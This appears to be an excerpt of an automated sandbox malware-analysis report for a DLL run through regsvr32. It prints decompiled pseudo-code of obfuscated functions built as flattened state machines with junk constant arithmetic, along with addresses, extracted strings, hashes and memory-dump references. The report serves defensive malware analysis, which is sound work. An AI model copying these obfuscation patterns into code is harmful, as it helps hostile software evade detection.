					_v608 = _v608 | 0x898d686f;
					_v608 = _v608 + 0x2cf0;
					_v608 = _v608 ^ 0x89cbb297;
					_v616 = 0xb43d4d;
					_v616 = _v616 + 0xc961;
					_v616 = _v616 * 0x57;
					_v616 = _v616 + 0x2f6b;
					_v616 = _v616 ^ 0x3d85db10;
					_v592 = 0x4e547c;
					_v592 = _v592 << 7;
					_v592 = _v592 ^ 0x27234b8c;
					_t266 = E003C9A53(_v620, _v604,  &_v524, _v596, _v624, _v612, _v600, _v620, _v608, 0, _v620, _v616, _v592); // executed
					_t335 = _t266;
					_t338 = _t338 + 0x2c;
					__eflags = _t335 - 0xffffffff;
					if(_t335 == 0xffffffff) {
						_t262 = 0xe1a05;
						goto L16;
					} else {
						_t262 = 0x3f2c2;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t262 - 0xe1a05;
				} while (_t262 != 0xe1a05);
				goto L19;
			}

0x003cb1aa
0x003cb1b2
0x003cb1b8
0x003cb1bc
0x003cb1be
0x003cb1cb
0x003cb1d3
0x003cb1d3
0x003cb1e0
0x003cb460
0x003cb466
0x003cb46a
0x003cb46f
0x003cb473
0x003cb477
0x003cb47b
0x003cb47f
0x003cb483
0x003cb487
0x003cb48b
0x003cb48f
0x003cb497
0x003cb49f
0x003cb4a7
0x003cb4af
0x003cb4b4
0x003cb4bc
0x003cb4c4
0x003cb4cc
0x003cb4d1
0x003cb4dd
0x003cb4de
0x003cb4e2
0x003cb4ea
0x003cb4f7
0x003cb4fb
0x003cb509
0x003cb511
0x003cb519
0x003cb52d
0x003cb534
0x003cb538
0x003cb53a
0x003cb53f
0x00000000
0x003cb1e6
0x003cb1eb
0x003cb456
0x00000000
0x003cb1f1
0x003cb1f6
0x003cb6a5
0x003cb6af
0x003cb6b7
0x003cb6bd
0x003cb6c2
0x003cb6c8
0x003cb6d0
0x003cb6d8
0x003cb6e1
0x003cb6e6
0x003cb6ea
0x003cb6ea
0x003cb6ea
0x003cb6fa
0x003cb1fc
0x003cb201
0x003cb444
0x003cb448
0x003cb44d
0x00000000
0x003cb207
0x003cb20c
0x003cb296
0x003cb2a0
0x003cb2a8
0x003cb2b0
0x003cb2b8
0x003cb2c0
0x003cb2c8
0x003cb2cd
0x003cb2d5
0x003cb2dd
0x003cb2e5
0x003cb2ea
0x003cb2f2
0x003cb300
0x003cb303
0x003cb307
0x003cb324
0x003cb329
0x003cb333
0x003cb33e
0x003cb348
0x003cb350
0x003cb357
0x003cb359
0x003cb35d
0x003cb365
0x003cb372
0x003cb376
0x003cb37e
0x003cb386
0x003cb390
0x003cb398
0x003cb3a5
0x003cb3b8
0x003cb3c3
0x003cb3c6
0x003cb3cb
0x003cb3d3
0x003cb3d6
0x003cb3e1
0x003cb3e5
0x003cb3ed
0x003cb3f5
0x003cb3fe
0x003cb402
0x003cb40a
0x003cb412
0x003cb41a
0x003cb42e
0x003cb435
0x00000000
0x003cb212
0x003cb217
0x00000000
0x003cb21d
0x003cb21d
0x003cb22a
0x003cb233
0x003cb23b
0x003cb243
0x003cb24b
0x003cb253
0x003cb258
0x003cb260
0x003cb268
0x003cb270
0x003cb285
0x003cb28c
0x00000000
0x003cb28c
0x003cb217
0x003cb20c
0x003cb201
0x003cb1f6
0x003cb1eb
0x003cb703
0x003cb70c
0x003cb70c
0x003cb547
0x003cb54f
0x003cb557
0x003cb55f
0x003cb567
0x003cb56f
0x003cb577
0x003cb57f
0x003cb587
0x003cb58f
0x003cb597
0x003cb59f
0x003cb5a7
0x003cb5af
0x003cb5b7
0x003cb5bf
0x003cb5c4
0x003cb5ce
0x003cb5d2
0x003cb5da
0x003cb5e2
0x003cb5ea
0x003cb5f2
0x003cb5fa
0x003cb602
0x003cb60a
0x003cb612
0x003cb61a
0x003cb627
0x003cb62f
0x003cb637
0x003cb63f
0x003cb647
0x003cb64c
0x003cb67d
0x003cb682
0x003cb684
0x003cb687
0x003cb68a
0x003cb693
0x00000000
0x003cb68c
0x003cb68c
0x00000000
0x003cb68c
0x00000000
0x003cb698
0x003cb698
0x003cb698
0x00000000

Strings

C, xrefs: 003CB519
2?', xrefs: 003CB350
k/, xrefs: 003CB62F
gy, xrefs: 003CB4B4
|TN, xrefs: 003CB63F
dzQ, xrefs: 003CB567

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Handle$CloseFileInformation
String ID: 2?'$C$dzQ$gy$k/$|TN
API String ID: 4277350669-147225122
Opcode ID: 6495f5de40b604d4aad77b4954a76ae16809e3f1a9012dfc43758d662d7c7b17
Instruction ID: b2bfd5cd521f3ebe2afe44b7e8b36689fadd7eb6c0ed3e37cf4e301457b4868c
Opcode Fuzzy Hash: 6495f5de40b604d4aad77b4954a76ae16809e3f1a9012dfc43758d662d7c7b17
Instruction Fuzzy Hash: BAD100B150D3429FC349CF25D58990BBBE1BBD8748F504A2DF0D9A6260D3B4CA498F97

Uniqueness

Uniqueness Score: -1.00%

Function 003D39B8 Relevance: 6.5, Strings: 5, Instructions: 248
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E003D39B8(void* __ecx, void* __edx) {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				void* _t255;
				intOrPtr _t261;
				void* _t270;
				void* _t273;
				intOrPtr _t276;
				intOrPtr _t278;
				void* _t282;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				signed int _t293;
				signed int _t298;
				intOrPtr _t309;
				void* _t325;
				signed int* _t329;

				_t329 =  &_v1056;
				_v1044 = 0xb8d11;
				_v1056 = 0x91db63;
				_v1056 = _v1056 * 0x53;
				_t325 = 0xb865b;
				_v1056 = _v1056 + 0xfffffc2e;
				_v1056 = _v1056 ^ 0x2f415271;
				_v1048 = 0x36ec94;
				_v1048 = _v1048 << 1;
				_v1048 = _v1048 >> 3;
				_v1048 = _v1048 | 0xfa5cb10c;
				_v1048 = _v1048 ^ 0xfa574192;
				E003DF930();
				do {
					while(_t325 != 0xd4) {
						if(_t325 == 0xb865b) {
							_t325 = 0xd4;
							continue;
						} else {
							if(_t325 == 0xc582b) {
								_v1052 = 0xe3ffcf;
								_v1052 = _v1052 + 0xb3fc;
								_v1052 = _v1052 << 8;
								_v1052 = _v1052 ^ 0xe4bc8c94;
								_v1044 = 0xfebe6c;
								_t292 = 0x7c;
								_v1044 = _v1044 / _t292;
								_v1044 = _v1044 ^ 0x00018791;
								_v1056 = 0x5e3796;
								_v1056 = _v1056 + 0x7fd5;
								_t293 = 0xc;
								_v1056 = _v1056 / _t293;
								_v1056 = _v1056 ^ 0x000ad8e7;
								_v1048 = 0xee1bfd;
								_v1048 = _v1048 + 0xd22d;
								_v1048 = _v1048 >> 5;
								_v1048 = _v1048 * 0x37;
								_v1048 = _v1048 ^ 0x0198c0a4;
								_t270 = E003CD933(_v1052, _v1044, 0x3c10a0, _v1056, _v1048);
								_v1052 = 0x14307c;
								_v1052 = _v1052 << 0x10;
								_v1052 = _v1052 | 0x5db6c1d7;
								_v1052 = _v1052 ^ 0x7df8b10c;
								_v1048 = 0xaae636;
								_v1048 = _v1048 ^ 0xe0d2783f;
								_v1048 = _v1048 * 0x32;
								_v1048 = _v1048 * 0x5d;
								_v1048 = _v1048 ^ 0x4ee571fa;
								_t273 = E003C48C6();
								_v1056 = 0x57363f;
								_v1056 = _v1056 >> 0xd;
								_v1056 = _v1056 + 0xfffff0e2;
								_v1056 = _v1056 * 0x1f;
								_v1056 = _v1056 ^ 0xfff82ea9;
								_v1052 = 0x4cbb17;
								_v1052 = _v1052 << 1;
								_v1052 = _v1052 >> 3;
								_v1052 = _v1052 ^ 0x001ac761;
								_v1044 = 0x97c63d;
								_t298 = 0x69;
								_v1044 = _v1044 / _t298;
								_v1044 = _v1044 ^ 0x000a95e4;
								_v1048 = 0x912083;
								_v1048 = _v1048 ^ 0x842b0755;
								_v1048 = _v1048 >> 0xb;
								_v1048 = _v1048 >> 9;
								_v1048 = _v1048 ^ 0x000e3565;
								_t276 =  *0x3e2208; // 0x28e510
								_t278 =  *0x3e2208; // 0x28e510
								E003C2388(_v1056,  &_v520, _v1052, _v1044, _t270, _t278 + 0x1c, _v1048, _t273, _t276 + 0x22c);
								_v1056 = 0x912cd6;
								_v1056 = _v1056 >> 8;
								_v1056 = _v1056 + 0xad18;
								_v1056 = _v1056 ^ 0x000aff51;
								_v1044 = 0x8f6b30;
								_v1044 = _v1044 | 0x181f9bf8;
								_v1044 = _v1044 ^ 0x189ffb54;
								_v1052 = 0x9139c0;
								_v1052 = _v1052 | 0x1895068a;
								_v1052 = _v1052 + 0xebb;
								_v1052 = _v1052 ^ 0x18989563;
								_t282 = E003C43D3(_v1056, _v1044, _v1052, _t270);
								_t329 =  &(_t329[0xd]);
								_t325 = 0xec84c;
								continue;
							} else {
								if(_t325 != 0xec84c) {
									goto L10;
								} else {
									_v1052 = 0x654769;
									_v1052 = _v1052 + 0x1780;
									_v1052 = _v1052 ^ 0x006df1ea;
									_v1044 = 0x396434;
									_v1044 = _v1044 * 0x37;
									_v1044 = _v1044 ^ 0x0c5827ac;
									_t282 = E003C3F40( &_v520, _v1044,  &_v1040, _v1044); // executed
								}
							}
						}
						L6:
						return _t282;
					}
					_v1048 = 0x4d2c39;
					_v1048 = _v1048 | 0xf0be9495;
					_v1048 = _v1048 + 0x50f3;
					_t287 = 0x61;
					_v1048 = _v1048 / _t287;
					_v1048 = _v1048 ^ 0x02706ecb;
					_v1044 = 0xa38633;
					_v1044 = _v1044 * 0x72;
					_v1044 = _v1044 >> 0x10;
					_v1044 = _v1044 ^ 0x000f727d;
					_v1056 = 0x1013ae;
					_v1056 = _v1056 >> 0xe;
					_v1056 = _v1056 * 0x13;
					_v1056 = _v1056 + 0xfffff80d;
					_v1056 = _v1056 ^ 0xfff1ee93;
					_v1052 = 0x1a7a6;
					_v1052 = _v1052 + 0x44f5;
					_v1052 = _v1052 >> 0xb;
					_v1052 = _v1052 ^ 0x000e38f3;
					_t255 = E003CD933(_v1048, _v1044, 0x3c1000, _v1056, _v1052);
					_v1048 = 0x4b5f57;
					_t289 = 0x73;
					_v1048 = _v1048 / _t289;
					_v1048 = _v1048 ^ 0x000deece;
					_v1056 = 0x155250;
					_v1056 = _v1056 << 0x10;
					_v1056 = _v1056 + 0xffff8610;
					_v1056 = _v1056 + 0xfcf4;
					_v1056 = _v1056 ^ 0x52551aec;
					_v1052 = 0x1d2749;
					_v1052 = _v1052 * 0x6b;
					_v1052 = _v1052 ^ 0x0c2b3e9a;
					_v1044 = 0x590fdd;
					_v1044 = _v1044 >> 1;
					_v1044 = _v1044 * 0xe;
					_v1044 = _v1044 ^ 0x026d1864;
					_t261 =  *0x3e2208; // 0x28e510
					_t309 =  *0x3e2208; // 0x28e510
					_t226 = _t309 + 0x1c; // 0x3a0043
					E003D0E90(_t226, __eflags, _t289, _v1056, _v1052, _t261 + 0x22c,  &_v1040, _v1044, _t255);
					_v1056 = 0xb37a0f;
					_v1056 = _v1056 + 0xffff20e4;
					_v1056 = _v1056 ^ 0x00b9ec9f;
					_v1044 = 0x88ed60;
					_v1044 = _v1044 ^ 0x2295ddc7;
					_v1044 = _v1044 + 0xffff320a;
					_v1044 = _v1044 ^ 0x2216b74d;
					_v1052 = 0xf4c39d;
					_v1052 = _v1052 >> 0xd;
					_t242 =  &_v1052;
					 *_t242 = _v1052 ^ 0x000846fe;
					__eflags =  *_t242;
					E003C43D3(_v1056, _v1044, _v1052, _t255);
					_t329 =  &(_t329[0xc]);
					_t325 = 0xc582b;
					L10:
					__eflags = _t325 - 0x679c6;
				} while (__eflags != 0);
				goto L6;
			}

0x003d39b8
0x003d39be
0x003d39c6
0x003d39d9
0x003d39dd
0x003d39df
0x003d39e7
0x003d39ef
0x003d39f7
0x003d39fb
0x003d3a00
0x003d3a08
0x003d3a19
0x003d3a23
0x003d3a23
0x003d3a2d
0x003d3cc0
0x00000000
0x003d3a33
0x003d3a39
0x003d3a9e
0x003d3aa8
0x003d3ab0
0x003d3ab5
0x003d3abd
0x003d3acb
0x003d3ad0
0x003d3ad6
0x003d3ade
0x003d3ae6
0x003d3af2
0x003d3af5
0x003d3af9
0x003d3b01
0x003d3b09
0x003d3b11
0x003d3b1b
0x003d3b1f
0x003d3b3c
0x003d3b41
0x003d3b4b
0x003d3b50
0x003d3b58
0x003d3b60
0x003d3b68
0x003d3b75
0x003d3b7e
0x003d3b82
0x003d3b92
0x003d3b97
0x003d3ba1
0x003d3ba8
0x003d3bb7
0x003d3bbb
0x003d3bc3
0x003d3bcb
0x003d3bcf
0x003d3bd4
0x003d3bdc
0x003d3be8
0x003d3beb
0x003d3bef
0x003d3bf7
0x003d3bff
0x003d3c07
0x003d3c0c
0x003d3c11
0x003d3c19
0x003d3c29
0x003d3c47
0x003d3c4c
0x003d3c54
0x003d3c59
0x003d3c61
0x003d3c69
0x003d3c71
0x003d3c79
0x003d3c81
0x003d3c89
0x003d3c91
0x003d3c99
0x003d3cae
0x003d3cb3
0x003d3cb6
0x00000000
0x003d3a3b
0x003d3a41
0x00000000
0x003d3a47
0x003d3a47
0x003d3a56
0x003d3a5e
0x003d3a66
0x003d3a73
0x003d3a7b
0x003d3a8c
0x003d3a92
0x003d3a41
0x003d3a39
0x003d3a93
0x003d3a9d
0x003d3a9d
0x003d3cc7
0x003d3cd1
0x003d3cd9
0x003d3ce7
0x003d3cea
0x003d3cee
0x003d3cf6
0x003d3d03
0x003d3d07
0x003d3d0c
0x003d3d14
0x003d3d1c
0x003d3d26
0x003d3d2a
0x003d3d32
0x003d3d3a
0x003d3d42
0x003d3d4a
0x003d3d4f
0x003d3d6c
0x003d3d71
0x003d3d86
0x003d3d8a
0x003d3d8e
0x003d3d96
0x003d3d9e
0x003d3da3
0x003d3dab
0x003d3db3
0x003d3dbb
0x003d3dc8
0x003d3dcc
0x003d3dd4
0x003d3ddc
0x003d3de5
0x003d3ded
0x003d3dfa
0x003d3e0d
0x003d3e18
0x003d3e1b
0x003d3e20
0x003d3e28
0x003d3e30
0x003d3e38
0x003d3e40
0x003d3e48
0x003d3e50
0x003d3e58
0x003d3e60
0x003d3e65
0x003d3e65
0x003d3e65
0x003d3e7a
0x003d3e7f
0x003d3e82
0x003d3e87
0x003d3e87
0x003d3e87
0x00000000

Strings

iGe, xrefs: 003D3A47
9,M, xrefs: 003D3CC7
?6W, xrefs: 003D3B97
qRA/, xrefs: 003D3A14
W_K, xrefs: 003D3D71

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9,M$?6W$W_K$iGe$qRA/
API String ID: 0-3114760887
Opcode ID: 7ad57e73c23d4f5c5dbb35df179291923f200800e7449fe7b51c6b6c041c03be
Instruction ID: 3c150c21012a8f1f6ff893d3e26987787e3d323e23892289d863f7cdef942163
Opcode Fuzzy Hash: 7ad57e73c23d4f5c5dbb35df179291923f200800e7449fe7b51c6b6c041c03be
Instruction Fuzzy Hash: 54C10F725093429FC359CF25D58A80BBBE1BBC8B18F104A1DF5D5AA260C3B5CA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 10064D73 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E10064D73() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x10094b18;
				_t18 = GetVersion();
				 *0x10094B6C = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x10094B70 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x10094B74 = _t19;
				 *0x10094B78 = _t40 - _t19;
				 *0x10094B7C = _t19;
				 *0x10094B80 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x10094b80)) = _t28 + 1;
				}
				E10046CD5(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E10046C91(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

0x10064de8
0x10064dea
0x10064e01
0x10064e0b
0x10064e0e
0x10064e10
0x10064e11
0x10064e18
0x10064e1b
0x10064e1e
0x10064e21
0x10064e24
0x10064e27
0x10064e32
0x10064e35
0x10064e35
0x10064e3a
0x10064e41
0x10064e44
0x10064e5d
0x10064e62
0x10064e6a
0x10064e6d
0x10064e74
0x10064e75
0x10064e78
0x10064e7f

APIs

GetVersion.KERNEL32(?,?,?,10064D6E), ref: 10064DEA
GetProcessVersion.KERNEL32(00000000,?,?,?,10064D6E), ref: 10064E27
LoadCursorA.USER32 ref: 10064E55
LoadCursorA.USER32 ref: 10064E60

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 428a3effaa3e1dd00160bd250a3b551b28d96e5cc533ee343c5f1932319f4109
Instruction ID: d44cde794fba28d3f85db3882be0837fe773da63e11fa9dd40bad6c004a323d7
Opcode Fuzzy Hash: 428a3effaa3e1dd00160bd250a3b551b28d96e5cc533ee343c5f1932319f4109
Instruction Fuzzy Hash: 77113AB1A00B608FD728DF3E889552ABBE5FB487057510D3FE18BC6B90EB74A4408B54

Uniqueness

Uniqueness Score: -1.00%

Function 003DE978 Relevance: 5.2, Strings: 4, Instructions: 214
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E003DE978(signed int __ecx, void* __edx) {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				void* _t179;
				signed int _t185;
				void* _t186;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t211;
				intOrPtr _t213;
				intOrPtr _t224;
				signed int _t228;
				void* _t229;
				signed int* _t231;
				void* _t234;

				_t207 = __ecx;
				_t231 =  &_v540;
				_v528 = 0xb4f53;
				_t179 = 0xef521;
				_t206 = _v528;
				_t229 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t234 = _t179 - 0x7ea97;
						if(_t234 > 0) {
							break;
						}
						if(_t234 == 0) {
							_v536 = 0x361910;
							_v536 = _v536 | 0x059bf3a4;
							_v536 = _v536 ^ 0x05bbe828;
							_v540 = 0x580dbf;
							_v540 = _v540 >> 0xa;
							_t208 = 0x73;
							_v540 = _v540 / _t208;
							_v540 = _v540 + 0xaef9;
							_v540 = _v540 ^ 0x000d16fe;
							_v532 = 0x736c66;
							_v532 = _v532 * 0x3b;
							_v532 = _v532 + 0xba33;
							_v532 = _v532 + 0x1e48;
							_v532 = _v532 ^ 0x1a9e6e8d;
							E003DA952(_v536, _v540, _v532, _t206); // executed
							_pop(_t207);
							L11:
							_t179 = 0xab563;
							continue;
						}
						if(_t179 == 0x4700) {
							_v536 = 0x7f0122;
							_v536 = _v536 * 0x77;
							_t179 = 0x7ea97;
							_v536 = _v536 ^ 0x3b0986e7;
							_t228 = _v536;
							continue;
						}
						if(_t179 == 0x1fd7f) {
							_v532 = 0x850420;
							_v532 = _v532 * 7;
							_v532 = _v532 >> 0xa;
							_v532 = _v532 ^ 0x0001386b;
							_v536 = 0x3561d1;
							_v536 = _v536 ^ 0xfbb0c32b;
							_v536 = _v536 | 0x3b562e52;
							_v536 = _v536 ^ 0xfbd1abac;
							_v540 = 0x1e2481;
							_v540 = _v540 * 0x65;
							_v540 = _v540 >> 0xc;
							_v540 = _v540 << 8;
							_v540 = _v540 ^ 0x00b9ab79;
							E003C2493(_t207,  &_v520, _v532, _v536, _v540);
							_v528 = 0xdb067f;
							_v528 = _v528 + 0xffff4ab0;
							_v528 = _v528 ^ 0x00d3121b;
							_v540 = 0x91076b;
							_v540 = _v540 + 0x9789;
							_v540 = _v540 | 0x89a1d985;
							_t211 = 0x45;
							_v540 = _v540 / _t211;
							_t174 =  &_v540;
							 *_t174 = _v540 ^ 0x01fd8639;
							__eflags =  *_t174;
							_t202 = E003D0965(_v528, _v540,  &_v520);
							_t213 =  *0x3e2208; // 0x28e510
							 *((intOrPtr*)(_t213 + 0x434)) = _t202;
							L23:
							return _t229;
						}
						if(_t179 == 0x22f33) {
							_v536 = 0x2c3e3d;
							_v536 = _v536 << 8;
							_t32 =  &_v536;
							 *_t32 = _v536 ^ 0x2c3e3d1c;
							__eflags =  *_t32;
							_t228 = _v536;
							goto L11;
						}
						if(_t179 != 0x42763) {
							goto L20;
						}
						_v536 = 0x772c4b;
						_v536 = _v536 ^ 0x252d8a4a;
						_v536 = _v536 ^ 0x2555a63e;
						_v540 = 0x325377;
						_v540 = _v540 << 5;
						_v540 = _v540 >> 0xf;
						_v540 = _v540 ^ 0x000aa9c6;
						_v532 = 0x7f581c;
						_v532 = _v532 + 0xffff7a5b;
						_v532 = _v532 * 0x3a;
						_v532 = _v532 >> 0xa;
						_v532 = _v532 ^ 0x0002cad1;
						_t207 = _v540;
						_t204 = E003D5053(_t207, _v532, _t207, _v536); // executed
						_t206 = _t204;
						_t231 =  &(_t231[3]);
						if(_t204 == 0) {
							_t179 = 0x22f33;
						} else {
							_t205 =  *0x3e2208; // 0x28e510
							_t207 = 1;
							 *((intOrPtr*)(_t205 + 0x18)) = 1;
							_t179 = 0x4700;
						}
					}
					__eflags = _t179 - 0x9b2b1;
					if(_t179 == 0x9b2b1) {
						E003C4949();
						_t179 = 0x1fd7f;
						goto L20;
					}
					__eflags = _t179 - 0xab563;
					if(_t179 == 0xab563) {
						_v536 = 0x370a2;
						_push(_t207);
						_push(_t207);
						_v536 = _v536 * 0x3d;
						_v536 = _v536 >> 9;
						_v536 = _v536 ^ 0x00093b89;
						_v528 = 0x3f6f65;
						_v528 = _v528 + 0xcb03;
						_v528 = _v528 ^ 0x004313b5;
						_v532 = 0xf07141;
						_v532 = _v532 * 3;
						_v532 = _v532 ^ 0xd22be565;
						_v532 = _v532 ^ 0xd0fccd83;
						_v524 = 0xc8ce1e;
						_v524 = _v524 >> 6;
						_v524 = _v524 ^ 0x00071dda;
						_v540 = 0x53ca70;
						_v540 = _v540 * 0x6d;
						_v540 = _v540 << 7;
						_v540 = _v540 ^ 0xd6993736;
						_t207 = _t228;
						_t224 =  *0x3e2208; // 0x28e510
						_t129 = _t224 + 0x1c; // 0x3a0043, executed
						_t185 = E003CD5B0(_t207, _t129, _v536, _v528, _v532, _v524, _t207, _v540); // executed
						_t231 =  &(_t231[8]);
						__eflags = _t185;
						_t186 = 1;
						_t229 =  ==  ? _t186 : _t229;
						_t179 = 0x9b2b1;
						goto L1;
					}
					__eflags = _t179 - 0xef521;
					if(__eflags != 0) {
						goto L20;
					}
					_v532 = 0x30e6cc;
					_v532 = _v532 | 0xe65fb246;
					_v532 = _v532 ^ 0xe2c5ef27;
					_v532 = _v532 ^ 0x04bf0160;
					_v536 = 0xfffa40;
					_v536 = _v536 ^ 0xe1feae65;
					_v536 = _v536 ^ 0xe106cb33;
					_v540 = 0x283f23;
					_v540 = _v540 + 0xffffcd9a;
					_v540 = _v540 + 0xfffffac4;
					_v540 = _v540 ^ 0x00240cf7;
					_push(_t207);
					 *0x3e2208 = E003C8D52(_t207, 0x440, __eflags);
					_t179 = 0x42763;
					_t207 = _t207;
					goto L1;
					L20:
					__eflags = _t179 - 0x4e9a8;
				} while (_t179 != 0x4e9a8);
				goto L23;
			}

0x003de978
0x003de978
0x003de981
0x003de989
0x003de98e
0x003de992
0x003de999
0x003de99e
0x003de99e
0x003de99e
0x003de99e
0x003de9a0
0x00000000
0x00000000
0x003de9a6
0x003deab1
0x003deabb
0x003deac3
0x003deacb
0x003dead3
0x003deade
0x003deae2
0x003deae6
0x003deaee
0x003deaf6
0x003deb03
0x003deb07
0x003deb0f
0x003deb17
0x003deb2b
0x003deb31
0x003dea83
0x003dea83
0x00000000
0x003dea83
0x003de9b1
0x003dea8d
0x003dea9a
0x003dea9e
0x003deaa0
0x003deaa8
0x00000000
0x003deaa8
0x003de9bc
0x003decb9
0x003decca
0x003decce
0x003decd3
0x003decdb
0x003dece3
0x003deceb
0x003decf3
0x003decfb
0x003ded08
0x003ded0c
0x003ded11
0x003ded16
0x003ded2a
0x003ded2f
0x003ded39
0x003ded41
0x003ded49
0x003ded51
0x003ded59
0x003ded67
0x003ded6a
0x003ded72
0x003ded72
0x003ded72
0x003ded83
0x003ded88
0x003ded91
0x003ded98
0x003deda3
0x003deda3
0x003de9c7
0x003dea6a
0x003dea72
0x003dea77
0x003dea77
0x003dea77
0x003dea7f
0x00000000
0x003dea7f
0x003de9d2
0x00000000
0x00000000
0x003de9d8
0x003de9e0
0x003de9e8
0x003de9f0
0x003de9f8
0x003de9fd
0x003dea02
0x003dea0a
0x003dea12
0x003dea1f
0x003dea23
0x003dea28
0x003dea39
0x003dea3d
0x003dea42
0x003dea44
0x003dea49
0x003dea60
0x003dea4b
0x003dea4b
0x003dea52
0x003dea53
0x003dea56
0x003dea56
0x003dea49
0x003deb37
0x003deb3c
0x003dec9f
0x003deca4
0x00000000
0x003deca4
0x003deb42
0x003deb47
0x003debd9
0x003debe6
0x003debe7
0x003debe8
0x003debec
0x003debf1
0x003debf9
0x003dec01
0x003dec09
0x003dec11
0x003dec1e
0x003dec22
0x003dec2a
0x003dec32
0x003dec3a
0x003dec3f
0x003dec47
0x003dec54
0x003dec58
0x003dec5d
0x003dec6e
0x003dec7c
0x003dec82
0x003dec85
0x003dec8a
0x003dec8d
0x003dec91
0x003dec92
0x003dec95
0x00000000
0x003dec95
0x003deb4d
0x003deb52
0x00000000
0x00000000
0x003deb58
0x003deb65
0x003deb6d
0x003deb75
0x003deb7d
0x003deb85
0x003deb8d
0x003deb95
0x003deb9d
0x003deba5
0x003debad
0x003debc1
0x003debc9
0x003debce
0x003debd3
0x00000000
0x003deca9
0x003deca9
0x003deca9
0x00000000

Strings

fls, xrefs: 003DEAF6
R.V;, xrefs: 003DECEB
eo?, xrefs: 003DEBF9
#?(, xrefs: 003DEB95

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
